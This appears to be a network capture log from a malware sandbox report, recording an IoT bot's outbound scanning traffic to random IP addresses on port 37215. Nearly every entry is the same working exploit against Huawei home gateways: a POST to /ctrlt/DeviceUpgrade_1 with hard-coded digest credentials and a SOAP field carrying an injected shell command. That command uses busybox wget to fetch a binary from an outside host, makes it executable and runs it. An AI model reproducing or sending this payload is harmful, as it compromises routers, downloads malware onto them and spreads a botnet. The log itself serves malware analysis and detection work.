                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  723192.168.2.1339450197.223.32.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313524961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  724192.168.2.1336082209.117.234.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313539982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  725192.168.2.1359300194.50.186.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313568115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  726192.168.2.1357162157.182.196.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313585043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  727192.168.2.134736441.156.153.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313597918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  728192.168.2.135415641.35.64.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313606024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  729192.168.2.1341892197.86.63.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313625097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  730192.168.2.134626041.98.167.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313637972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  731192.168.2.1358494140.27.181.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313654900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  732192.168.2.134508841.177.168.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313674927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 